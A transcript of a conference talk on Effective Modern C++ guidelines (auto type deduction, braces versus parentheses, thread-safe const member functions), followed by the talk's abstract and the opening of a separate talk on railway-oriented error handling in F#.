Now, how many people, when writing their unit tests, are testing with containers of more than 4 billion elements? Let me go to my spot where I can see you. I'm not seeing too many. I'm seeing no hands. This is the kind of mistake that can creep in, because you're not actually using the right type. If on the other hand you said auto sz is v.size(), you automatically get the right type on the right platform. So now we're moving beyond simply it's easier to type. Now we're getting into some actual technical reasons. I have a map where the keys are strings and the values are integers. And now I decide what I want to do is some operation, it's a read-only operation, on every one of the elements of that map. So it would be common for people to say, all right, for every reference to a constant pair from string to int, because I know that a map holds pairs, the keys are strings, the values are ints. It's a read-only operation I want to perform, so I don't want to copy that pair. So I'm going to take it by reference to const. So this says, for every one of those pairs in the map, do something with it. It seems entirely reasonable. This will compile. This will run. This will run slowly. And the reason this will run slowly is because although this is a map from string to int, you may dimly recall that the key part of a map is declared const. So the contents of the map are actually const strings and ints. That's the type of pair stored in the map. It's a pair of a const string and an int. What this code says is: take every one of those pairs consisting of a const string and an int. From it, copy it into an unnamed temporary pair of type string and int. So you just pay to copy everything. Bind that temporary to the reference to const and do something on the temporary, which is probably not what you wanted to do. Now, issue number one, performance problem. You're copying everything even though you specifically passed things by reference to const to avoid copying them.
But there are some more subtle issues here, too. Inside the loop here, which I'm not showing, but inside the body of the loop, if you are assuming that you actually have a reference to a pair in the map, you have a reference to an element of that map. You're assuming, for example, you could take a pointer to it and get a pointer to a pair in the map. But with the code the way it's written here, if you take a pointer to it, you will take a pointer to the temporary copy of what's in the map. And the validity of that pointer will go away at the end of the loop iteration. You will be left with a dangling pointer. So if you stored that pointer someplace, maybe in another data structure, thinking that its lifetime was valid as long as the elements of the map, you have a really fun way to spend the dark Norwegian winters debugging your code. However, if instead you decided to use auto, because that's what the cool kids do, you could just say const auto&, and this will automatically pick up the appropriate type that is stored in the map. It's still taken by reference to const. This won't generate any temporaries at all. This will actually give you a reference to the elements of the container. Any questions about how this works? Yeah. So the question is what type would be deduced for auto here, essentially. And the answer is auto will deduce the actual type of what is stored in the container. So it's going to be a pair of const string and int. That's what auto will expand into. All right? At this point, I hope you are beginning to appreciate that auto is not a matter of making things easy for people to type, although that is part of it. That's sort of the initial allure. There's more to it. There's performance issues. There's correctness issues. Auto simply helps keep you from making certain kinds of mistakes. Let us suppose you create a function object. Probably the easiest way to create a function object is by using a lambda expression.
If you create a lambda, you create a closure, technically, and you want to store it in a runtime data structure so you can use it later. Maybe, for example, you have a container of callbacks. So when an event occurs, you want to call some arbitrary number of functions. You need to be able to store the lambda somewhere. Now what you could do is store it using a std::function object here. So this is actually an object of a template which will store the closure created by the lambda. This will work fine. However, a std::function object is essentially fixed in size. During compilation, the compiler sets aside a certain amount of space for a std::function object, because it's just a class instance. It uses a certain amount of memory. So the question is, what happens if the closure that is created from this lambda won't fit in that chunk of memory? Because it might not. It might be too big. No problem. std::function under those conditions will allocate heap memory and will store the copy of the closure on the heap, which leads to the observation that the closure might be stored on the heap. So using this, depending on the size of the closure created from the lambda, which is determined by the number of objects that are captured by the lambda, you might pay for heap allocation. Of course, you'll pay for heap deallocation later. If I now take the resulting function object, call it f, so this is a function object, and I want to call it, I say f(22). This is an invocation of the function object. I'm calling the function object. Now internally, the function object might hold a pointer which points off to something on the heap, which is actually ultimately what's going to get invoked. And the reason that's important is because it means that this function call here is possibly an inline function call, but possibly an out-of-line function call. Maybe it's inline, maybe it's not.
It depends on a combination of factors, one of which is just how good the compiler is. Code works, code runs. If, on the other hand, you take exactly the same lambda and instead store it in an auto object, the compiler will figure out the type corresponding to this lambda, whatever that type is. Once the compiler knows what the type is, it knows exactly how much space is needed to store an object of that type. It will therefore take an object of that type and put it on the stack. This will not be stored on the heap under any conditions. So this is definitely not on the heap, and this is not an optimization issue. It's just not on the heap. And when I now make the function call here, the closure call is typically inlined. In fact, I would assume it is going to be inlined. The only reason I say typically is because there are some language lawyers in this room and I have to watch out, because the standard does not 100% guarantee that it's going to be inlined. Having said that, it's going to be inlined. Maybe not in debug mode. So we end up with a situation where using a std::function object, an unknown type, we possibly incur heap allocation and deallocation, and we possibly give up inlining. Typing auto instead gives us definitely no heap allocation and deallocation and also essentially guarantees us inlining. Now, in this case here, I'm showing a function object created from a lambda. There are other ways to create function objects. So if you are one of the people who likes to use bind, and Nico's talk notwithstanding, there actually are some people who do like to use bind. Most of them are part of a 12-step program to eventually get them away from it. But there are still a few people going through that process. And in fairness, there's a lot of legacy code that uses bind, because bind was a perfectly valid tool prior to C++11. So this idea of using auto to store function objects is not a lambda-specific thing.
It's valid for any function object. So I have encouraged you to use auto instead of using explicit type declarations. It's great advice, except when it doesn't work. Because sometimes auto does the wrong thing, which means we need to have a better understanding, given the technical advantages we've talked about, of when auto does the wrong thing and what to do about it. The first case has to do with braced initializers. If I say auto, give a variable name, and then I give a braced initializer, there's a special rule in the standard. This deduces a type of std::initializer_list of int. Now, if I only show you that piece of information, you might go, well, all right, that doesn't seem too bad. The problem is if I say auto x2 = 5, it deduces a type of int. If I say auto x3 parenthesis 5, it deduces a type of int. So for some syntaxes, auto plus an int initializer deduces the type int. But if you use braces, it will deduce a different type. In particular, if I say braces like this, with or without the equal sign, it makes no difference: they both deduce an initializer list of int. How many people have made this mistake in their code? Oh, you guys have not lived. It is a veritable rite of passage when moving to C++11 to start typing auto and then suddenly find out that nothing is working the way that you expect, only to find out it's because you thought you were creating an int here and you actually created an initializer list. It's only the case for braces. Fundamentally, if I say auto x and then I have a braced initializer, the equal sign is optional. It does not matter whether the equal sign is there. It's the braces that are important. Basically, under these conditions, the type of the variable you are creating is not going to be the type of the expression.
So decltype(x), the type of the variable you're creating, is not going to be equal to the decltype of the expression you're using to initialize it, which is a little strange, because normally you say auto deduces the type of the initializing expression. This is the one case where it does not. In this syntax here where I have auto and I have braces, that's the combination that leads to trouble: auto and a braced initializer. Again, the equal sign doesn't make a difference. When you have that combination, then the type of the variable you are creating is more or less equal to an initializer list of the type of the expression. And the reason I say more or less equal is because if I actually showed you what it was equal to, it would keep going over in that direction for a ways. But frankly, what it is equal to is not anywhere near as important as understanding that it doesn't deduce the type that you expect. Yeah. The curly braces actually indicate that it's supposed to be an array. So the comment is that the curly braces indicate that it's supposed to be an array. The problem is that the curly braces are used to mean more than one thing. In this particular context, it would be perfectly reasonable to say it's trying to interpret it as a sequence of values. C++ does not apply that interpretation consistently. It's kind of a bigger story. Regardless of whether it is applied consistently or not, what I will say is that this is literally the only place in C++ where a braced initializer will be deduced to have this type. As an example, if you take a braced initializer and you pass it to a template, type deduction will fail. A braced initializer does not have a type. It's just a special rule for auto. So many people have tried to say, okay, this is how I'm going to think about it. And there are ways to think about it that can help reduce the confusion.
But as far as I know, there is no single interpretation which is consistent across the entire language. Another problem for auto type deduction is hidden proxy types. So I'm going to talk about vector of bool. If you've had a proper education in C++, when you see vector of bool, you begin to feel nauseous, because you've been taught you should never use it, or possibly you shrink in fear. The only reason I'm using vector of bool is because it is part of the standard library, which means you can verify everything I'm going to tell you by going to your standard library implementation and looking inside the code to see exactly how it's implemented. This is a representative of a large class of libraries that use what are known as proxy types. I only use this one because you can check this one out yourself. And I'll get back to that in a moment. So if I have a vector of bool, a vector of bool is a packed representation of bools. Every boolean takes a bit. So if I now say bool b1 is vb sub 5, in this case the type of b1 is bool. Unsurprising. I've declared it to be bool, so b1's type is bool. This is not a surprise. If I say auto b2 gets vb sub 5, we have a problem. The reason we have a problem is because vb sub 5, the indexing operator for a vector, normally returns a reference to the indexed element. If I say vb sub 3, I normally get a reference to the third element. You can't have a reference to a bit. The smallest addressable thing in C++ is a char. You can't have a reference to a bit, but this is a vector of bits, basically. So the question is, how do they make that work? The way that it works is that vb sub 5 for vector of bool returns an object of type vector of bool, colon, colon reference, which is actually a class. Don't be fooled by the name. It's a class. It happens to be called reference. So when I say auto b2, the type I get back is vector of bool, colon, colon reference. So this code compiles.
But you don't have the type you think you have. In many, many cases, you'll continue to use the object, and it'll behave exactly the way that you think it's going to behave, because there's an implicit conversion from vector of bool, colon, colon reference to bool. So if you ever try to use this thing in a boolean context, it converts and life goes on. Almost like they designed it that way. But the fact that the return type of the array bracket operator on a vector of bool is not a reference, you can tell from time to time. For example, if I were to assert that the address of b1 is not equal to the address of b2, which makes sense. Local variable b1, local variable b2, they had better not have the same address. If they had the same address, the compiler would be doing something very peculiar. So I should be able to assert that they definitely are not at the same location on the stack. That assertion will not compile. And the reason the assertion won't compile is because you are attempting to compare a pointer to a bool with a pointer to a vector of bool, colon, colon reference, and you can't compare two different pointer types that have nothing in common. So the code won't compile. Think about proxies. Proxy objects are designed to stand for something else. So a vector of bool, colon, colon reference object is designed to stand for a bool. And there are some assumptions made, usually by implementers, regarding the lifetime of those temporaries. And in particular, a common assumption is that they're not going to live beyond the end of the statement. As an example, in GCC 4.7, probably still true in 4.9, I just haven't checked. I don't check every time a new version of the compiler comes out. In GCC 4.7, vector of bool, colon, colon reference, that type, and you can consult the library to find out what it does, that type contains a pointer to a word on the machine with the referenced bit. Remember, it stands for a bit.
So what you actually get back is an object which has a pointer, the pointer points to the word, and it's got an offset which tells it which bit in the word is the one that it refers to. So a vector of bool, colon, colon reference is a pointer and an index that says: this word, this location in the word. That's how it's implemented on that particular library. At least it was in GCC 4.7. Now that means we have a pointer to a chunk of memory, and that leads to the possibility that we can have a dangling pointer if the lifetimes aren't correct. I have an example. So here's a function called makeBoolVec. It's a factory function. It returns a vector of bool. So this is a function that creates a vector of bool and returns it as its return value. Now what I do is I say makeBoolVec, that's the function call. So makeBoolVec gives me this return value, which is a vector of bool. I index it to get element number three, which we will assume is a valid element. So now I have one of these vector of bool, colon, colon reference objects. It contains, in GCC's case, a pointer and an index. But I've declared the result type to be bool. So there's an implicit conversion from a vector of bool, colon, colon reference into a bool. So what it does is it takes the pointer, goes to the word, finds the bit, sees if it's true or false, sticks the value in b1, life's wonderful. Everything works. Instead, if I say, okay, auto bit is makeBoolVec sub three: again, call makeBoolVec, get a temporary vector of bool, index in to get element number three, which we will assume exists, get back a proxy object which we now store. So now I've got this proxy object called bit. It contains a pointer to the vector of bool that was returned by this function. That would be the vector of bool that will be automatically destroyed at the end of the statement, because it's a function's return value.
Which means by the time we finish executing this lovely little semicolon here, we have this charming object on the stack which contains a pointer to memory which no longer corresponds to a vector of bool. And now I just say, okay, b2 is of type bool and it's a copy of bit. This has undefined behavior. Now these two statements appear conceptually to do the same thing, but they don't do the same thing. So this is an example of where auto deduces the wrong type. I mean, auto deduces the right type, just the wrong type from what we want. As I said, the reason that I chose vector of bool is because you can verify everything I'm telling you by looking at your library implementation to see exactly what they do with vector of bool, colon, colon reference. Have a field day. I'm not lying to you. But you're probably not using vector of bool. But if you are using other third-party libraries, especially in areas where you're trying to get maximum performance, which turns out to not be terribly uncommon for C++ developers, you could well be using a library that is using proxy types. A while ago I took a look at the Boost libraries. So this is an example of some Boost libraries: Boost uBLAS, Boost Xpressive, Boost Proto, Boost Meta State Machine. All of those libraries use proxies. How do I know? They document it. I do not know of an easy way to avoid having auto deduce a proxy type. It, alas, requires some knowledge of the library that you are using. Essentially what's happening is when you use auto with those kinds of libraries, it is deducing an implementation detail that the library author had hoped to keep hidden from you. And you need to be aware that if you use auto, there is a possibility that you're going to have that problem. So if you know you're using this kind of a library, and the only way I know of to know that is to simply read some documentation about the library, you need to use auto with greater caution. Doesn't mean you don't use it.
It just means you need to be aware that you probably don't want to use it all the time. And for what it's worth, there actually have been some proposals for C++17, or maybe C++20 or C++23. Maybe they'll fix it, but it doesn't do us any good right now. So for the foreseeable future, you just need to be aware of this problem. When I talk about auto, some people are very resistant to the idea. And they go, you know, I'm not going to be able to understand the code, and I'm very concerned about having maximum code clarity. This is fine. So if you believe, in your professional software engineering judgment as engineers, that the explicit type is clearer, that it will yield clearer, easier to understand, easier to maintain code, great. That's what they pay you for, to use that engineering judgment. Use it. But I do think it is important to bear in mind that, first, there's been a ton of success in other languages with similar features. C++ is not at the cutting edge of type inference. C++ is not even at the leading edge of type inference. You could call it the trailing edge of type inference. So this is not new territory. And I also remark, as a practical matter, for a lot of people using IDEs, for example Visual Studio, the type of an auto-declared variable is actually visible in the IDE. So although it may not be expressly visible in the source code, it could be visible through a tool that you are using in developing your code. So I think you should bear that in mind when making the decision whether to use auto or not use auto. So my guidelines are to prefer auto to explicit type declarations, which I do think yields, generally speaking, easier to write, easier to read code, and in many cases avoids certain kinds of tricky errors involving either performance or correctness, as we have seen. And certainly you should definitely remember that auto plus a braced initializer will always deduce an initializer list type. Any questions on that? I'm sorry, time's up. New guideline.
I want to talk about parentheses versus braces, which builds a little bit on Nico's talk last time. My guideline, and I spent literally years trying to figure out what my advice is about parentheses versus braces, my advice is: understand the trade-offs, because I don't think there is a great piece of advice for what to do. We start with the notion of uniform initialization. Uniform initialization. It's uniform. We can use it everywhere. Braces, it's great. So if we want to initialize an integer with 44, this will work. Remember, don't use auto. If I have a struct and I want to initialize the fields of the struct, I can use braces. Great. If I have a string and I want to give it a value, I can use braces. Oh, so wonderful. If I have a class that has a data member, I can use braces on the member initialization list. This is so cool. If I have an array, I can use braces. Somebody mentioned earlier that braces are supposed to give the values of an array, but that's not the only place. If I have a vector, I can use braces. If I have a raw freaking pointer, I can use braces to initialize its value. Not that anybody would use pointers. Uniform initialization. That's the sales pitch. You can use it everywhere. I don't use the term uniform initialization. And the reason I don't use the term uniform initialization is because that suggests it's uniform, that you should use it everywhere. And I don't believe that that is reasonable advice. I think there are a lot of advantages to what's known as uniform initialization. However, I prefer to refer to it as brace initialization. That's what I'll be calling it from now on. So, the first thing about brace initialization is that it has a unique feature, which is that narrowing conversions are illegal. Only brace initialization will reject narrowing conversions. A narrowing conversion basically means that the compiler cannot guarantee that the value of a larger type will be able to be stored in a smaller type.
So, as an example, if I have a point which has two integers and I say Point p1, curly brace, 1, 2.5. Now, in C++98, this was completely fine code. The 2.5, which is a double, would be truncated to initialize y. So, in C++98, that compiles and has well-defined semantics. In C++11, this code will not compile. And the reason it won't compile is because I'm using braces, and this is a double and that's an int, and 2.5, last I checked, cannot be exactly represented as an integer. The code won't compile. So, if you want it to compile, you can make it compile, you just do a cast. All the cool kids use static casts, not C casts. But it's important to understand that this notion of rejecting narrowing conversions exists in exactly one place in the language: only brace initialization. So, if I say int a = 2.5, this used to compile because it goes back to the days of C, and it still compiles. It'll truncate to 2 and initialize your integer. No warning, no error. Well, no error. Might get a warning. But if you try to do exactly the same thing using braces, the code will be rejected. Given that narrowing conversions normally don't make any sense, like I want to store a double as an int, an implicit truncation, I think it's a feature that braces don't let you do that. That's a plus. We now have two different syntaxes for calling constructors. So I can say widget w1 and I pass some arguments in curly braces, widget w2 and I pass arguments in parentheses. They both work, usually. Both choose the best-match constructor. However, there are different rules for what it means to be the best match. Now, this is something that Nico talked about in his last presentation. Only brace initialization matches initializer list parameters, and those matches are actually preferred. Let me give you an example. So this is a simplified declaration from the standard library, from the standard vector class. So here's vector. It takes a number of elements and a value. It takes an initializer list of T.
This is not affected by the change that Nico was talking about at the end of his last talk. So if I say v1 with 100, 5, notice that I'm using braces. Now, because I'm using braces, I could pass the 100 as the size and the 5 as the initial value. Two arguments. That would work. Or I could say 100 and 5 are two initial values to go into the vector. There is, in some sense, ambiguity here. But the language rules say when you use braces and it is possible to call an initializer list constructor, that is the one that you call. It's not ambiguous. So this means that the size of the vector is 2 and the values are 100 and 5. It calls this second constructor. If I take exactly the same code and I say, you know, I'm a traditionalist, I like the old ways, and the old way of passing constructor arguments was to use parentheses. So, exactly the same code, but now I use parentheses. Under these conditions, now it calls the first constructor, because initializer list constructors are only considered if you use braces. If you don't use braces, they're not even considered. So the result of this is a vector whose size is 100, with every value set to 5. So it does something different. They're not interchangeable. Now, this only makes a difference if you actually have an initializer list constructor. So here's a gadget class. It has one constructor. It takes two integers. So if I say I want to create a gadget g1 with 10 and 20, or a g2 also with 10 and 20, braces and parentheses, they do exactly the same thing. They both call this constructor. Makes no difference. They do the same thing. If I now say g3 with 89.5 and 0, notice that I'm using parentheses, the compiler says, okay, 89.5, that's a double. I'm going to pass it to an int. No problem. I'll take that 89.5, get rid of that pesky .5. We didn't want that half of a number anyway. Compiles. But if I do the same thing inside curly braces, it won't compile.
And the reason it won't compile is because this double can't be represented in that integer exactly. Again, brace initialization rejects narrowing conversions. Yes? Is the question, does this also apply to larger integer types going to smaller integer types? Correct. It does. Essentially, the only time that a larger type going to a smaller type will be permitted to compile is if the compiler can prove that the value will fit. As an example, if I said I want to initialize an int and I said the initial value is going to be 22 long, so long is bigger than an int in general, but we know that the value 22 will fit in an int. That will compile. On the other hand, if I said long l equals 22 and then initialized the int with the long in curly braces, that won't compile. Make sense? Yes. Okay. So basically, it doesn't compile unless the compiler can guarantee it's okay. Was there a question? What happens in your example if there is no initializer list constructor? Okay. So, all right. Is your question, what would happen here if we did not have the initializer list constructor? Okay. If we didn't have the initializer list constructor, they'd both call the first constructor. They'd do exactly the same thing. That's essentially the same as this example here. All right. So now, this leads to some really interesting situations. So I got tired of using widgets. I've been talking about widgets for 20 years. I'm moving on. I'm progressing. I'm growing. Let's talk about thingies. So I've got a thingy: it takes an int and an int, and thingies take an initializer list of double. So if I say parentheses with 10 and 20, it calls the first one. Remember, with parentheses, it will never call an initializer list constructor. It's very simple. It won't call it. If I use braces here, notice that these are integers, and x and y are integers, and this is an initializer list of double.
It's going to be a better match to go from two ints converted to doubles than two ints calling x and y. If there is a way to make the initializer list constructor work with braces, that's what it'll get called. If I have T3, 89.5 and 0, this is a matter of type conversion. So this will call number one. Notice that I've got a double here. This is a double. It still won't try to be converted into an initializer list. If you are using parentheses, the compiler literally pretends as if that constructor, the one with the initializer list, did not exist. All right. Now, this means that we can get some really interesting implications if we add new constructors to classes. Now, I want to be clear here. Anytime you have a class with some interface and you add a new overload to that class, it is possible that existing code that used to call some function in your class may now start calling the other overload. That's inherent when you add a new overload. So there's nothing special about initializer lists here. If you add a new overload to an overload set, code that used to compile and call one overload might now call the new overload, which is probably why you added it. So in this case here, I've got a widget. I'm using braces because I've embraced the uniform initialization lifestyle. This calls widget with 10 and 20. Life goes on. Life's good. Somebody comes along later. They add an initializer list constructor to it. Notice that it's an initializer list of float. This code, unchanged, legacy code, no longer calls this constructor. It now gets converted to two floats because braces really want to match an initializer list constructor. If there is any way to make it compile, it will compile. This is neither a good thing nor a bad thing. It's just a characteristic of the way overload resolution works in C++ and you need to be aware of it. 
Now, presumably when you added this initializer list overload, you meant: anytime anybody is using braces, I want to treat that as an initializer list. If that's not what you meant, you need to have a little talk with your API designers. So here's our situation. Essentially, we've talked about this here. So the guideline is to distinguish between parentheses and braces when initializing objects. Any questions about that? All right. The last guideline I want to talk about, then, is to make const member functions thread safe. We have known from the beginning of C++ that there were two different ways to interpret constness. There's logical constness, which means conceptually nothing changes. And there's bitwise constness, which means none of the bits inside an object actually gets modified. So bitwise constness, this is what compilers enforce; conceptual constness, this is what developers should implement. With any luck, this is completely old news. We've been talking about this since 1995. I've been talking about this since 1995. My God, what happened to me? 1995, never mind. All right. Mutable. Also available since 1998. Mutable, as I like to put it, tells the compiler: ha, ha, I was kidding about the const. So a mutable data member is permitted to be modified even inside a const member function. It is very useful when implementing conceptual constness, in particular for doing things like caching, which is probably its most common use. So here I have a widget class. It has a member function called magicValue, which computes a magic value. So computing the magic value conceptually does not change the widget. If I go to a widget and say, so what's your magic value, it goes crunch, crunch, crunch, crunch. Here's my magic value, but it didn't change the widget. It's the same widget it was before.
If, however, we assume that it's computationally expensive to determine what the magic value is, we would prefer not to have to compute it unless somebody asks for it, which means we don't want to compute it up front. But if somebody does ask us for it, we don't want to have to compute it multiple times, because it's expensive, which means we'd like to cache it if we ever do compute it. So we can implement it like this. We could say, all right, I'm going to create a mutable bool called cacheValid and a mutable int called cachedValue. What I'm going to do is, if I ever compute the value of the magic number, I will store it, and then I will say that the cached value is valid, so I can look it up again in the future and save myself some time. So here's my code. If the cache is valid, great, I just return the cached value. Now, if the cache is not valid, maybe because nobody's ever called this function before, then what I do is I say, okay, the cached value is, I call some expensive computation, I say cacheValid is now true, and I return the cached value. A perfectly standard way of implementing a cache using mutable. In C++98, there's no C++11 here, this works fine. Life's good. C++11 introduced this tiny new feature. It's called concurrency. It has some minor implications for programmers. For example, nothing works anymore. A few things work. But as an example, let us suppose that I've got some widget w, and now in thread one, I say auto v1 is w.magicValue. Crunch, crunch, crunch, crunch. It's figuring out the magic value. Thread two at the same time calls w.magicValue. Crunch, crunch, crunch, crunch. It's doing the same thing. Now, I want to go back a slide and show you that magicValue I have declared to be a const member function. It does not change the conceptual state of the widget. You should be able to have multiple people reading a widget simultaneously. They're all readers.
And because I declared it const, because it is logically const, I have declared these two data members mutable. The problem I have is that in this case here, here's thread number one, it's calling a const member function. It's a read operation. Here's thread number two. It's calling a const member function. It's a read operation. If I know that I'm writing code with multiple threads simultaneously reading something, that does not require synchronization. I don't need to get a mutex or anything else if all my threads are readers. It's safe to read things simultaneously. It's conceptually safe. The problem is that magic value, in case you've forgotten, that was the previous slide, those look like write operations to me. The const member function is conceptually const. It fulfills the conceptual const requirement. The problem is it's not bitwise const. And that makes a big difference when it comes to concurrency. So this means both of the reads may actually write the mutable data members, which means we have two threads which are both readers and writers. That's the definition of a data race. That means undefined behavior. And that's just bad. What's key here is there's nothing wrong with the calling code. Both threads are performing read operations. There's nothing wrong with those threads. They're doing perfectly reasonable behavior. Possibly the code was written so they would do a lot of reads. So you can't blame them. Well, if the client code's not wrong and the behavior's undefined, that pretty much means the implementation code is wrong. No other way to look at that. Widget magic value is a broken function. Now, fixing it is really easy, and this is where C++11 comes in. So all we have to do is, okay, I'm going to slap in a mutex, and I'm going to declare the mutex to be mutable because locking a mutex changes its state. It's a non-const operation. Unlocking a mutex also changes its state. Non-const operation. 
So I need to perform non-const operations on the mutable inside the const member function. Sorry, on the mutex. So no problem. I lock the mutex at the beginning of the function. I perform the operation to figure out what the value is, and then this object in its destructor will automatically unlock the mutex, so this closed curly brace here unlocks the mutex. This works fine. This fixes the problem. Now, in some cases you don't need a mutex. In some cases you might only need an atomic variable, which is a variable where operations on it are guaranteed to be viewed atomically by other threads. For example, let's suppose I'm keeping track of how many times the function is called. So here's my gadget class. Here's a get-wait function, and for whatever reason I want to know how often is get-wait called. Under those conditions I could have an int and I could have a mutex to limit access to the int, but or what I can do, which is a little faster in many cases, is I can just use an atomic unsigned. So what that means is that when I call plus plus call count, that's a read modify write operation. It's guaranteed to be executed atomically, typically through a single underlying machine instruction. Typically it is faster at runtime than using a mutex. So this works fine. So notice I'm not saying you should always use a mutex. This doesn't need a mutex. However, if we go back to our example with the cache and we say, okay, I'm going to make the cached value an atomic int and the cached valid an atomic bool, this is the way of thinking it says, well, if atomic is cheaper than using a mutex, I'm going to use them all over the place. I'm a C++ programmer. I don't pay for what I don't need. So here's the code again. Now in this case I've rewritten it a little bit differently here. So I check the cache to see if it's valid. If so, I return cache value. Otherwise, in this case, I perform an expensive computation number one, which I store as V1. 
I now perform an expensive computation number two, which I store as V2. I now say, okay, the cache is valid. That's true now. And I return the cache value, which is V1 plus V2. So I've just broken the expensive computation into two pieces. It's all I've done. This is not thread safe. Why not? Let me get in my spot. Okay. Now I can see you. Yes. Each of the lines are atomic, but the whole transaction is not atomic. Okay. You are correct. Each of the lines is atomic, but the transaction is a whole, excuse me, the whole thing is not transactional. The problem is that one thread can come in, see that cache is not valid, start doing the expensive computations, and then can say cache valid is set to true. In the meantime, another thread comes in and goes, oh, the cache is valid because the other thread just set it to true. So it now returns the cache value, but we haven't computed the cache value yet because the first thread hasn't yet performed the sum operation. Oops, wrong answer. Only happens once every five years or so. So we don't really care. We can fix that operation, you say. No problem. What we'll do is we'll compute the cache value before we set cache valid to true. Right? That'll fix the problem. It will fix the problem. You'll get the right answer. This works. It just works harder than it should. Thread comes in, checks to see if cache valid is true. It's not. Starts performing the expensive computations and then adds V1 and V2 together. At this point, we've performed the expensive computations. We are ready to go. Another thread comes in, checks to see if cache is valid. It's not yet because we haven't yet executed this statement in the first thread. Enters the loop, starts those expensive computations all over again. In the meantime, 22 other threads also check cache valid simultaneously because you are running on a 48 core machine. And they are now all performing the expensive computations. You are really going to get the answer now. Yes? 
So the question is, won't each thread get its own value? If we proceed on the assumption that there is only one magic value for the widget, in other words, no matter how many times you compute it, it will always get the right answer, every thread should ultimately get the same answer. It's just that we're going to compute those sub-computations every time. Let me think for a minute. Let me put it this way. That's the best case scenario. Okay? Let me check and see. Okay, in this particular case, because they're both atomic, I don't have to worry about partial results being read by a thread, so I believe that what I said is true. But even if this does return the right answer all the time, it's much more expensive than it needs to be. So, you know, the problem is if you have more than one data member and they need to be kept in sync somehow, you need a transaction. If you need a transaction, almost certainly what you want to do is use a mutex. So declare the mutex as I showed you before. Now cached value and cache valid, these don't need to be atomic any longer. Atomics are cheaper than mutexes, but more expensive than non-atomics. So these can now become regular, ordinary ints and bools, because we're now using the lock guard solution. So if you have a const member function in C++11, the first version of the language that supports concurrency, it should either be bitwise const or it should be internally synchronized, meaning that if it's doing read and write operations, outside callers can call it safely without having to acquire a mutex. If you find yourself in a situation where you know for a fact that your class will never be used concurrently, you just know that. Simplest way to know it: you're writing a single threaded application. There are no other threads. Under those conditions, then using atomics or acquiring and releasing a mutex is incurring a cost you do not need.
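The lock-guard solution just described — one mutex making the whole check-compute-store sequence a transaction — might be sketched like this. The helper names and the values 40 and 2 are invented; the point is the `mutable std::mutex` and the single `std::lock_guard` covering both the check and the update:

```cpp
#include <mutex>
#include <cassert>

class Widget {
public:
    int magicValue() const {
        std::lock_guard<std::mutex> guard(m);  // one lock makes check-compute-store a transaction
        if (!cacheValid) {
            cachedValue = expensiveComputation1() + expensiveComputation2();
            cacheValid = true;
        }
        return cachedValue;                    // guard's destructor unlocks m at the closing brace
    }
private:
    int expensiveComputation1() const { return 40; } // stand-ins for the real work
    int expensiveComputation2() const { return 2; }
    mutable std::mutex m;     // mutable: locking/unlocking are non-const operations
    mutable bool cacheValid = false;
    mutable int cachedValue = 0;
};
```

Because the mutex serializes the whole function body, `cacheValid` and `cachedValue` can be plain `bool` and `int` rather than atomics.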
If the logic of your program is such that we know that there will never be, for a particular kind of object, two threads using it simultaneously. For example, if I have a phased design and in the first phase of the design, only one thread uses the object and in the second phase, only some other thread uses the object, but they never access the object simultaneously. If you know that, if by design of your program you guarantee that they will never be simultaneously accessed, under those conditions, that's an exception to the rule. So if you are writing purely single threaded applications, you never think about threading at all, you can forget about this guideline, program in C++98. But if you are programming in a context where it is possible for your classes to be used in a multi-threaded environment where there could be simultaneous readers, then you need to follow the guideline that I'm giving you, which is to make const member functions thread safe. Any questions about that? So the question is how do you ensure that if you are using a third party library that they have basically done this. If you find a third party library that's not doing this correctly, you need to file a bug report with the library. I mean, it's just a concurrency bug in the library. So you may have to pay the cost of discovering that as a bug. I mean, essentially in moving from a world with only one thread to a world with multiple threads, it is not going to be surprising if third party libraries are going to have some concurrency errors in them. Yeah. In your previous example, the mutex, you could use the mutex inside the else clause. So the question is, can't I move the mutex inside the else clause? And the answer is no. Because otherwise, then I'd be reading cache valid outside the mutex. Okay.
So essentially the question is, all right, I want to move the lock guard inside the else and then I'm going to make cache valid atomic so that my threads can still check it safely. Trust me, you're still going to get in trouble. In particular on relaxed memory architectures. This leads us right down the road into memory barriers and stuff like that. And that is a hell I do not want to go to. So I'm afraid I'm going to have to cut you off if you're asking more questions about that. I have a laser. I'm not afraid to use it. Okay. So here's the summary of what I want to talk about. We talked about three guidelines, but I slipped an extra one in there. So prefer auto to explicit type declarations. It's not just about programming style. It's also about efficiency and correctness. Remember that auto plus a brace initializer will deduce an initializer list. Distinguish parentheses and braces when creating objects. I'd love to be able to say always use one or always use the other. It's not that simple. I'm sorry. Make const member functions thread safe. If you're looking for more information about this, there's a true work of literary genius in the works, I hope. I'm working on a book called Effective Modern C++. I hope it's going to be out in October. If you want other guidelines based on information that will probably be in the book, I gave a presentation last year called An Effective C++11/14 Sampler. It covers different guidelines than what I talked about here. Herb Sutter has written a thing called Elements of Modern C++ Style. So you can get some guidance from those as well.
Scott Meyers’ Effective C++ books are renowned for their clear, insightful descriptions of how to get the most out of C++, but they were written for C++98—for “old” C++. “New” C++ is defined by the C++11 and nascent C++14 standards, and Scott Meyers’ forthcoming Effective Modern C++ is devoted to the effective use of features in C++11 and C++14. For this presentation, Scott will select a few guidelines from Effective Modern C++ and walk you through them. The guidelines will focus on specific practices in C++98 that require revision for the most effective use of the modern versions of C++.
10.5446/50639 (DOI)
All right, can everyone hear me okay? Can everyone hear me all right? Yep. Okay, very good. All right, so welcome to railway-oriented programming. So in this talk, I'm going to explain the functional approach to error handling. And if you already understand the either monad with bind, then you don't need to be here. So, does anyone understand what I mean when I say either and bind? No. Okay, so hopefully this will be useful to you. Hopefully, actually, by the end of this talk, you actually understand what I'm talking about. Maybe not under that terminology, but under railway-oriented terminology. So, okay, so what do railways have to do with programming? Not a lot, except it's quite a nice metaphor for what I'm going to be talking about today, which is I'm trying to introduce these concepts using pictures and concepts that hopefully will be so obvious that you think, well, why did anyone ever think these things were complicated in the first place? So, my name's Scott Wlaschin. I managed to get the Twitter handle, Scott Wlaschin. That was very good. There was quite a lot of demand. I had to spend a lot of money to get that. I have a website called fsharpforfunandprofit.com, which is an F# website. And I have a consulting business called fpbridge.co.uk. The examples in this talk will be in F# because that's the language I use. But in fact, they will work equally well for Haskell, OCaml, Rust, and Swift, if you're into Swift. These are just very general concepts. Right, so what I'm going to talk about is I'm going to talk about happy path programming first, which is what we normally spend our time thinking about, what happens when everything goes right. And we basically don't spend enough time thinking about what happens when things go wrong. And that's really what this talk's about. So when we deal with things that go wrong, in an imperative language like C# or Java, we have certain ways we deal with that.
